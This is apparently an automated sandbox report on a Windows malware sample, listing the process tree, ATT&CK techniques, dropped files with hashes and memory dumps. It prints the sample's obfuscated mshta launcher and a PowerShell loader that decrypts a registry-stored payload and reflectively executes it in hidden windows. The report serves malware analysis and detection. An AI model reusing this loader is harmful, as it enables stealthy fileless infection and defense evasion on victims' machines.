PID 2956 wrote to memory of 1328	2956	$sxr-powershell.exe	23
PID 2956 wrote to memory of 1412	2956	$sxr-powershell.exe	24
PID 2956 wrote to memory of 1412	2956	$sxr-powershell.exe	24
PID 2956 wrote to memory of 1424	2956	$sxr-powershell.exe	25
PID 2956 wrote to memory of 1424	2956	$sxr-powershell.exe	25
PID 2956 wrote to memory of 1560	2956	$sxr-powershell.exe	26
PID 2956 wrote to memory of 1560	2956	$sxr-powershell.exe	26
PID 2956 wrote to memory of 1568	2956	$sxr-powershell.exe	27
PID 2956 wrote to memory of 1568	2956	$sxr-powershell.exe	27
PID 2956 wrote to memory of 1644	2956	$sxr-powershell.exe	28
PID 2956 wrote to memory of 1644	2956	$sxr-powershell.exe	28
PID 2956 wrote to memory of 1716	2956	$sxr-powershell.exe	29
PID 2956 wrote to memory of 1716	2956	$sxr-powershell.exe	29
PID 2956 wrote to memory of 1756	2956	$sxr-powershell.exe	30
PID 2956 wrote to memory of 1756	2956	$sxr-powershell.exe	30
PID 2956 wrote to memory of 1816	2956	$sxr-powershell.exe	31
PID 2956 wrote to memory of 1816	2956	$sxr-powershell.exe	31
PID 2956 wrote to memory of 1920	2956	$sxr-powershell.exe	32
PID 2956 wrote to memory of 1920	2956	$sxr-powershell.exe	32
PID 2956 wrote to memory of 1988	2956	$sxr-powershell.exe	33
PID 2956 wrote to memory of 1988	2956	$sxr-powershell.exe	33
PID 2956 wrote to memory of 1996	2956	$sxr-powershell.exe	34
PID 2956 wrote to memory of 1996	2956	$sxr-powershell.exe	34
PID 2956 wrote to memory of 1704	2956	$sxr-powershell.exe	35
PID 2956 wrote to memory of 1704	2956	$sxr-powershell.exe	35
PID 2956 wrote to memory of 1812	2956	$sxr-powershell.exe	36
PID 2956 wrote to memory of 1812	2956	$sxr-powershell.exe	36
PID 2956 wrote to memory of 2068	2956	$sxr-powershell.exe	37
PID 2956 wrote to memory of 2068	2956	$sxr-powershell.exe	37
PID 2956 wrote to memory of 2160	2956	$sxr-powershell.exe	38
PID 2956 wrote to memory of 2160	2956	$sxr-powershell.exe	38
PID 2956 wrote to memory of 2284	2956	$sxr-powershell.exe	40
PID 2956 wrote to memory of 2284	2956	$sxr-powershell.exe	40

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1160
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2688
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
  2⤵
  PID:2184
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
  2⤵
  PID:3352
- C:\Windows\$sxr-mshta.exe
  C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-FxsKvMUCzLeWaELdGLOz4312:idBvxoTT=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\$sxr-cmd.exe
    "C:\Windows\$sxr-cmd.exe" /c %$sxr-FxsKvMUCzLeWaELdGLOz4312:idBvxoTT=%
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:wogvKfZACZ; "
      4⤵
      PID:4408
  - - C:\Windows\$sxr-powershell.exe
      C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
      4⤵
      Executes dropped EXE
      Hide Artifacts: Hidden Window
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2956
    - - C:\Windows\$sxr-cmd.exe
        
        "C:\Windows\$sxr-cmd.exe" /C set "OuSCKzIGIC=[System.Diagnostics.Process]::GetProcessById(2956).WaitForExit();[System.Threading.Thread]::Sleep(5000); function UNfzn($xClFv){ $WbSZu=[System.Security.Cryptography.Aes]::Create(); $WbSZu.Mode=[System.Security.Cryptography.CipherMode]::CBC; $WbSZu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $WbSZu.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('lTarhfp6u1Agy15oNLxVpj6dBnF8BmKY6Ty73+U+6y0='); $WbSZu.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('rUu2VA/y4KuFP1rL7bXD7g=='); $azCZT=$WbSZu.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $tOvpl=$azCZT.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($xClFv, 0, $xClFv.Length); $azCZT.Dispose(); $WbSZu.Dispose(); $tOvpl;}function IuHgY($xClFv){ $TYsUi=New-Object System.IO.MemoryStream(,$xClFv); $gslLP=New-Object System.IO.MemoryStream; Invoke-Expression '$visiP @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$TYsUi,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $visiP.CopyTo($gslLP); $visiP.Dispose(); $TYsUi.Dispose(); $gslLP.Dispose(); $gslLP.ToArray();}function pJsry($xClFv){ $tOvpl = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($xClFv); $tOvpl = UNfzn($tOvpl); $tOvpl = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($tOvpl); return $tOvpl;}function execute_function($xClFv,$nToDA){ $whUgf = @( '$vZYVY = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::@L@o@a@d@([byte[]]$xClFv);'.Replace('@', ''), '$aXpxp = $vZYVY.EntryPoint;', '$aXpxp.Invoke($null, $nToDA);' ); foreach ($azboW in $whUgf) { Invoke-Expression $azboW };}$BsQgR = pJsry('j3SWBJnDtBSXUDWIQDjH4w==');$FRUpH = pJsry('yfPQstwRdrYR/hy2N8e8aEDnmusTtGBumQTQ3AgT8uk=');$JbuTw = pJsry('y9YgkeSTTw+y4ReNCM9oAA==');$PiqhF = pJsry('0MlaElWFo5tHejnXaMsM7A==');if (@(get-process -ea silentlycontinue $PiqhF).count -gt 1) {exit};$lLiFp = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($BsQgR).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($FRUpH);$znxuH=IuHgY (UNfzn ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($lLiFp)));execute_function $znxuH (,[string[]] ($JbuTw));" & echo Invoke-Expression $env:OuSCKzIGIC; | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul
        5⤵
        Loads dropped DLL
        Hide Artifacts: Hidden Window
        
        PID:4528
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OuSCKzIGIC; "
        6⤵
        
        PID:2708
      - C:\Windows\$sxr-powershell.exe
        
        C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
        6⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of AdjustPrivilegeToken
        
        PID:3240

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2068

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2284

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2940

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:3008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:3016

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3296

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:QSMYForUdD; "
    3⤵
    PID:4236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Deletes itself
    - Impair Defenses: Safe Mode Boot
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3648

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4684

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4364

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3056

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1860

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2852

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
PID:4772
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODk4QTg2RDQtNkNBMy00NzI3LTkyREYtREQ4MDQzQ0UzRUIwfSIgdXNlcmlkPSJ7OThGMzFBRDQtN0Y3Ni00MjlGLTg3MjktMjJGNjAxM0Q2OEU3fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7QTVCNjYwODItOUJGNy00NDUyLTg1QTEtN0EyNkE2QkVBNTdEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDcxNzgiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTY4MDM3MTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MjAzOTAxNTAyIi8-PC9hcHA-PC9yZXF1ZXN0Pg
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2340

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:5080
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5080 -s 896
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:3096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4424
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 548 -p 1596 -ip 1596
  2⤵
  PID:1168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:1596
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1596 -s 392
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
355KB

MD5
06066b07f9a23bb64bffc231f2705b7f

SHA1
78c56c8b9077231e6a3fa9ea491d33375489067a

SHA256
eb359c29faa2aa425116f3a3d827470076deb0eddfc08ff363e88b37718018af

SHA512
685ab46423a1329a41771e388ca3cecdbfc374abfbc902bf919f9438b4bebc196027ecf20fce20404fad5b622d8cbeea076a080c036203d95b96933d5fd2cc2c

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
361KB

MD5
16016e7e217f482facd1c26f9fe14ee8

SHA1
423e0d30831fc827552ca1ee2efcc7b822cc1e84

SHA256
6a6d9c6ac33b7193f5aad0dc6464042898e4afbc4254d2280b5b0cff80308cdd

SHA512
c527c3e4a8296bbf9c26cb0b07214dbd6e49ddf416e8ae92f1e7848fa9d4cdbbe6a4e7cd172a81bf61c7ae0f0289703f351229f2c92a0e1d1072cf3113a11edf

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\edb.log

Filesize
1.2MB

MD5
c192333547da60ef968496069a0057e6

SHA1
3f6663920f8ffb8a53499c404904dd97f5d142b5

SHA256
807ac60321357979784d7ee921cd11113f432bf7d681b02bbae26ab417178fdb

SHA512
38c38669af8ded74400c55e1890c3c7ec80c887c7df0b187fbc360a8623894c3d6b8893398358389908036d1a9c98faa35fc5c0fe992b3b84557301ab800004a

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\edb.log

Filesize
1.2MB

MD5
db0e4f0832943700792e74544d5bdff6

SHA1
88b104f60d1966f9e68eeb777c5d70b245dc2eda

SHA256
51699b487e8262e4a2392a13eab3d2773e1d524ac0a1a20a39349e26c1d3bb0b

SHA512
9e8af7c29a2c338d949d02874aeed2e00553b29cbbe5625e6e39ddf62858e54ce163c7dcc7c9e805917523c36853c1ba605297fe30548b3f635f0e9f7d48073d

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Filesize
768KB

MD5
4c53472466123d28f60584e15da06d79

SHA1
9654967f1ff895bb955830e7c79d3d03e3ea1cb6

SHA256
7e2f1a5cd6731d9638b2d6070f37be89bc7f90d9b2eefb33d6b5f7c5a3a1b01c

SHA512
b364be3928e93c0b3407331e1adc080b2a9c59248ea7b3be9071cfd5095d7c20a9a49c1a696ec1e88956e1253c7967ca9f8e9f3d7c1875002b4761f293b4daf2

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Filesize
16KB

MD5
222b0231bf19115f662f58b11d4351b0

SHA1
db561ac8cc10a55b3e903ef73819691d1f7407e4

SHA256
d6a09450bc66c152eef07bd1c75c46f64995441b23cad620e1de25cea664deb4

SHA512
3de63548c23084eb60fa6a1342caf9a918045596ffcca4853bbfe494d07033b716d14244149b9c66e2279433c037a7dd2c8154647d7aa7b98327a51e454140a6

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Filesize
16KB

MD5
4da2230c03f44f34bb8f6c723d81005c

SHA1
2f26bde9529b5c1746141b411c1d28da33592339

SHA256
9c377056ec409f6cc19368b602124259f17473bc13bbe39a07858dc7a8665d85

SHA512
d65923a1eedb9e66792f99f701a4f2c8267980ef7b583fcada9ea5a8fe8dbf329fd0ab4eab8a73a842d2f224a86f73d791594f45cb8e39b1ca98bf7e73f205a8

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER456E.tmp.csv

Filesize
37KB

MD5
b4e4ddfd0167dd077e5b713415f6ab00

SHA1
32448e71eedfbae30f0fa89dd098398d39508da8

SHA256
c824d8e846647d3442fb05b6d0fa51fc4e45d39e6f0864c622b74401c5f7f21d

SHA512
0f0ceae65a3864fb1d63d478a8faa8d26fc9c06483090153f6fdee15bad898d7b9c018213a3bde371d30068c8bfcb713d84cd783cbda9a32244fabfa32a96f67

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER45AD.tmp.txt

Filesize
13KB

MD5
a24ef1eebe7af601679a6506f6118f20

SHA1
a0a1c7f191769f71c0bef37bb48a12026b6f4337

SHA256
fcfdbbbbf2ab5fe60b7e9d155f58df5252480839c5e08356f6cc6d5ce15bea01

SHA512
af88ad3971a17f7cec3b1fa12486dc559bb87fcbc858ee769f0e17591696de8aed75de1f858678f19c14904984ab28d14faf5b881f56f72f0ff5236cb3ff8dc7

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER58F8.tmp.csv

Filesize
38KB

MD5
5b8adba5d2edf6c2aeb6c21298ef4f77

SHA1
c86968592348ea04db9ddf4d537373d4aa56a26d

SHA256
62f1c17ed86e08aa4656ce1f7462e3a8b4bb0e1b6605a7de48c39ef0cf70dce6

SHA512
12853732a345aa804977e09995998897605fd498467714ef3858bc069ec37cd49bbf7538b158977f463e4f39f0356d449ce0694ace0895b12d35f3ebbec46183

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5928.tmp.txt

Filesize
13KB

MD5
c04207579e23b01d9edea5ecc5ca8745

SHA1
8ae75daddd687da7d2421161833427d8391d3dfc

SHA256
539f977412d21cdd40aaa267109cf605a6eeb42fe754ca617836d9da5bb0a41b

SHA512
bea97898c0a4445b9814ca0c84e0f604e2e57c95aed4dc92cb485f624fa78e2ae11992e3b14de8c72006864b07a52ba4ed34c04c9f589d6533b23e85cdd2ee4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i5whczbb.itv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/468-124-0x000001A01B970000-0x000001A01B999000-memory.dmp

Filesize
164KB

Download
memory/468-125-0x000001A01B970000-0x000001A01B999000-memory.dmp

Filesize
164KB

Download
memory/468-117-0x000001A01B970000-0x000001A01B999000-memory.dmp

Filesize
164KB

Download
memory/468-123-0x00007FFF1E970000-0x00007FFF1E980000-memory.dmp

Filesize
64KB

Download
memory/672-100-0x000001EC71390000-0x000001EC713B9000-memory.dmp

Filesize
164KB

Download
memory/672-99-0x00007FFF1E970000-0x00007FFF1E980000-memory.dmp

Filesize
64KB

Download
memory/672-101-0x000001EC71390000-0x000001EC713B9000-memory.dmp

Filesize
